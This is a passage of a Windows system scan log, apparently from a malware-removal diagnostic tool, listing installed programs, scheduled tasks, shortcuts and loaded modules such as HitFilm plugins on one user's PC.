Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
OpenShot Video Editor (HKLM-x32\...\{C55769E7-0B81-4E22-B5CE-805506E6B6B2}) (Version: 2.0.7 - OpenShot Studios, LLC)
Oracle VM VirtualBox 5.1.6 (HKLM\...\{EEDDD7E2-A7A2-4FA9-8C32-ADB29A5096FF}) (Version: 5.1.6 - Oracle Corporation)
paint.net (HKLM\...\{A1D05314-DC32-4668-A97E-51060EC8BCCE}) (Version: 4.0.12 - dotPDN LLC)
PlayMemories Home (HKLM-x32\...\{94F4815B-755A-4FFA-AFDC-EE8FE776981E}) (Version: 4.3.00.04171 - Sony Corporation)
PMB_ModeEditor (x32 Version: 9.3.00 - Sony Corporation) Hidden
PMB_ServiceUploader (x32 Version: 9.3.00 - Sony Corporation) Hidden
PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.2888 - PMDG Simulations, LLC.)
PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6320 - PMDG Simulations, LLC.)
PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6320 - PMDG Simulations, LLC.)
POSKY Boeing 777-200 Pack FSX & P3D (HKLM\...\{684D778C-02D2-437D-AAEA-A2648B01AA93}) (Version: 1 - Project Open Sky)
Prism Video File Converter (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Prism) (Version: 2.62 - NCH Software)
PRO-ATC/X version 1.2.2.6 (HKLM-x32\...\PRO-ATC/X_is1) (Version: 1.2.2.6 - )
Product Improvement Study for HP ENVY 7640 series (HKLM\...\{9913BFAE-5E18-4863-8354-452337781573}) (Version: 34.2.117.50647 - Hewlett-Packard Co.)
Python 3.5.1 (32-bit) (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{c39d559b-aa83-4476-ba20-988a35a1199a}) (Version: 3.5.1150.0 - Python Software Foundation)
Python 3.5.1 Core Interpreter (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Development Libraries (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Documentation (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Executables (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Launcher (32-bit) (HKLM-x32\...\{17778F7B-FB5A-4A93-9719-D75BAF673498}) (Version: 3.5.150.0 - Python Software Foundation)
Python 3.5.1 pip Bootstrap (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Standard Library (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Tcl/Tk Support (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Test Suite (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
Python 3.5.1 Utility Scripts (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden
qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)
QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.40 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.)
Remote Desktop assistant (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\b948d155e8353e01) (Version: 1.0.0.102 - Remote Desktop assistant)
S2 version 1.8 (HKLM-x32\...\3712C137-820D-48BE-83B2-DE57BC51343F_is1) (Version: 1.8 - Parallax, Inc.)
Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)
SBACSecureBrowser (HKLM-x32\...\{157D208A-3283-46B2-B038-54F9BA4688E3}) (Version: 8.1.0 - AIR)
ScriptVOX Studio (HKLM-x32\...\{57f97356-8f1d-45cf-a325-9de4c0896ced}) (Version: 2.0.19.17620 - Screaming Bee)
ScriptVOX Studio (x32 Version: 2.0.19.17620 - Screaming Bee) Hidden
SDU version 3.8 (HKLM-x32\...\{A23B547D-36B0-4B85-B68A-AADF6C9A723B}_is1) (Version: 3.8 - )
SketchUp 2016 (HKLM\...\{E2B66CF6-ABA0-4E5F-B426-7478B18301AE}) (Version: 16.1.1449 - Trimble Navigation Limited)
SMART Common Files (HKLM-x32\...\{ED2455F7-6AA6-4D3C-85E9-A72297DD7051}) (Version: 11.0.246.0 - SMART Technologies ULC)
SpellQuizzer 1.4.2 (HKLM-x32\...\SpellQuizzer_is1) (Version:  - TedCo Software)
Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.)
Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 3.1.0.0 - Splashtop Inc.)
Spotify (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Spotify) (Version: 1.0.34.146.g28f9eda2 - Spotify AB)
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.107 - Synaptics Incorporated)
Synthesia (HKLM-x32\...\Synthesia) (Version: 10.2 - Synthesia LLC)
SynthFont (HKLM-x32\...\SynthFont) (Version:  - )
The Project SkyHigh MD-80 Base pack for FS2004 (HKLM-x32\...\The Project SkyHigh MD-80 Base pack for FS2004) (Version:  - )
UK2000 Heathrow Free FSX  (HKLM-x32\...\UK2000 Heathrow Free FSX) (Version: 3.0 - UK2000 Scenery)
Unity Web Player (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Universal Extractor 1.6.1 (HKLM-x32\...\Universal Extractor_is1) (Version: 1.6.1 - Jared Breland)
Verizon Internet Security Suite (HKLM-x32\...\MSC) (Version: 15.0.166 - McAfee, Inc.)
Vz In-Home Agent (HKLM-x32\...\VzInHomeAgent) (Version: 9.0.76.0 - Verizon)
VzDownloadManager (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\VzDownloadManager) (Version: 2.0.0.24 - Verizon)
Windows 10 Upgrade Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17354 - Microsoft Corporation)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
Wirecast (HKLM\...\{13CCAC84-0C34-4D13-8C99-02D9F8B4C714}) (Version: 6.0.6 - Telestream LLC)
Works Suite OS Pack (x32 Version: 1.0.0.0000 - Microsoft Corporation) Hidden
Works Synchronization (x32 Version: 1.0.0.0000 - Your Company Name) Hidden
XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job =>
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job =>  <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001Core.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-23814709-2432651133-2868963390-1001UA.job => C:\Users\Kyle Aniel\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForbanie_000.job =>
Task: C:\WINDOWS\Tasks\HPCeeScheduleForKYLE-PC$.job =>

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

Shortcut: C:\Users\Kyle Aniel\Favorites\NCH Software Download Site.lnk -> hxxp://www.nchsoftware.com/index.html
Shortcut: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FS Recorder for FSX\Website.lnk -> hxxp://www.fs-recorder.net/

ShortcutWithArgument: C:\Users\Kyle Aniel\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_bkgoccjhfjgjedhkiefaclppgbmoobnk\Audiotool.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=bkgoccjhfjgjedhkiefaclppgbmoobnk
ShortcutWithArgument: C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Chrome Remote Desktop.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) ->  --profile-directory=Default --app-id=gbchcmhmhahfdphkhkmpfmihenigjmpp

==================== Loaded Modules (Whitelisted) ==============

2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-09-29 15:14 - 2016-09-15 10:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-17 05:57 - 2016-09-17 05:57 - 01864384 _____ () C:\Users\Kyle Aniel\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\amd64\ClientTelemetry.dll
2016-03-14 14:55 - 2016-10-08 00:52 - 08923840 _____ () C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\1033\GrooveIntlResource.dll
2016-09-16 05:02 - 2016-09-16 05:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-10-13 15:27 - 2016-10-05 02:35 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-10-13 15:28 - 2016-10-05 02:21 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-10-13 15:28 - 2016-10-05 02:13 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-10-13 15:28 - 2016-10-05 02:14 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-09-28 05:05 - 2016-09-28 05:05 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-09-28 05:05 - 2016-09-28 05:05 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-09-28 05:05 - 2016-09-28 05:05 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00308224 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\glew32.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00377344 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Half.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 02626048 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\IlmImf.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00187904 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Iex.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00236544 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Imath.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 02573824 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\opencv_core2410.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 02236416 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\opencv_imgproc2410.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00135168 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\IlmThread.dll
2016-06-07 16:07 - 2016-06-07 16:07 - 00100864 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\zlibwapi.dll
2016-06-22 03:06 - 2016-06-22 03:06 - 00485016 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\4PointRamp.hfpl
2016-06-22 03:06 - 2016-06-22 03:06 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AlphaBrightnessContrast.hfpl
2016-06-22 03:06 - 2016-06-22 03:06 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AngleBlur.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoColor.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00525464 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoContrast.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoLevels.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00935064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\AutoLightFlares.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BezierWarp.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00472728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BoxBlur.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00419480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\BrightnessContrast.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00481432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Bulge.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00488088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Cartoon.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00662680 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Caustics.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00477336 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ChromaBlur.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00485528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Chromenator.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00526488 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CloneStamp.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00498840 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Clouds.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorBalance.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorDifferenceKey.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ColorTemperature.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 01478296 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CreditsTextCrawl.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CrushBlacksWhites.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\CrushBlacksWhitesAlpha.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00431768 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DayForNight.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00597656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Deinterlace.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Demult.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00611992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Derez.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00521368 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DifferenceKey.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00431256 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Diffuse.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00472728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DisplacementMap.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\DropShadow.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00439960 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Echo.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Emboss.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00428184 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\EnvironmentMapTransform.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00490648 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\EnvironmentMapViewer.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00445080 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ErodeWhite.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00419992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Fill.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FindEdges.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00473752 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FisheyeWarp.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00442520 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FisheyeWarp2.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00481432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FlyEye.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00427672 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ForceMotionBlur.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00551576 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FractalNoise.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FrameBlendedRetiming.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00420504 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\FreezeFrame.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00419992 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Gamma.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00503448 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Glow.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00483480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\GlowDarks.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00438424 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Grain.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00479896 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Grid.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00486040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HalfTone.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00477848 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Hotspots.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00435864 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HSL.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00425112 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HueColorize.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00427160 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HueKey.hfpl
2016-06-22 03:07 - 2016-06-22 03:07 - 00424088 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\HueShift.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00416920 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Invert.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00417432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\InvertAlpha.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00424600 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\JitterFrames.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00463000 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LensBlur.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Letterbox.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00536728 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Levels.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00898712 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LightFlares.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00528024 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Lightning.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00485016 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LightWrap.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\LuminanceKey.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00494232 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Magnify.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00449688 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\MatteCleaner.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Mosaic.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00662680 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\MotionBlur.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00498840 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\NeonGlow.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00422040 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Noise.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00453272 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\OilPainting.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00603800 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Parallax.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00429720 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PerspectiveWarp.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00728216 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Photorama.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00473752 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PolarWarp.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00444056 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\PondRipple.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00778392 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Portal.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Posterize.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00499352 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\QuadWarp.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00468120 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadialBlur.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00483480 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadialGradient.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00497816 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RadioWaves.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00580760 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RainOnGlass.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00481944 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Ramp.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00465048 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Reflection.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00418968 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\RemoveFringe.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00417432 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Reverse.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00469656 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\SetMatte.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00442008 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Shake.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00431256 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Sharpen.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00423576 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Solarize.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00523928 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Sphere.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00421528 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\SpillSuppressor.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00420504 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\ThreeStripColor.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00423064 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Threshold.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00466584 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Tiles.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00476824 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Timecode.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00531608 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\TimeDisplace.hfpl
2016-06-22 03:08 - 2016-06-22 03:08 - 00422552 _____ () C:\Program Files\FXHOME\HitFilm 4 Express\Plugins\2D\Tint.hfpl
